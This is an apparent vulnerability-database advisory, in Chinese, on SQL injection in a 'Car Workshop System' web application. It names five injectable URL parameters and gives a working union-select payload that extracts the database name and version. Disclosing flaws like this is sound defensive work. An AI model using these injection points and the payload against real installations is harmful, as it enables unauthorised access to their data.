|Car Workshop System - SQL Injection - VULHUB开源网络安全威胁库

Car Workshop System - SQL Injection

- AV AC AU C I A

发布： 2025-04-13

修订： 2025-04-13

Car Workshop System - SQL Injection Car Workshop System ，存在参数过滤不严，导致了sql注入漏洞，如果对方服务器开启了错误显示，可直接利用 Google Dork: N/A 注入点： http://localhost/[PATH]/services/print_service_invoice?job_id=[SQL] # purchase_order/deletePO?id= # technician_services/tech_opened_services_view?job_id= # technician_services/tech_drew_out_inventory_services_view?job_id= # technician_services/tech_completed_services_view?job_id= payload： 6'+/*!50000union*/+select+1,2,3,/*!50000concat*/(database(),0x7e,version()),5,6,7,8,9,10,11,12--+- 测试截图： ![](https://images.seebug.org/contribute/c0373857-2c0c-4255-b494-b9c89bbb35e3) PoC验证： ![](https://images.seebug.org/contribute/fdc8cabf-071d-4b86-a781-f4c191ea4191)

漏洞利用/PoC

暂无可用Exp或PoC

受影响的平台与产品

当前有0条受影响产品信息

您还没有登录，登录后可查看更多

添加资源
收藏资源
问题反馈

贡献用户

暂无贡献用户

VULHUB ™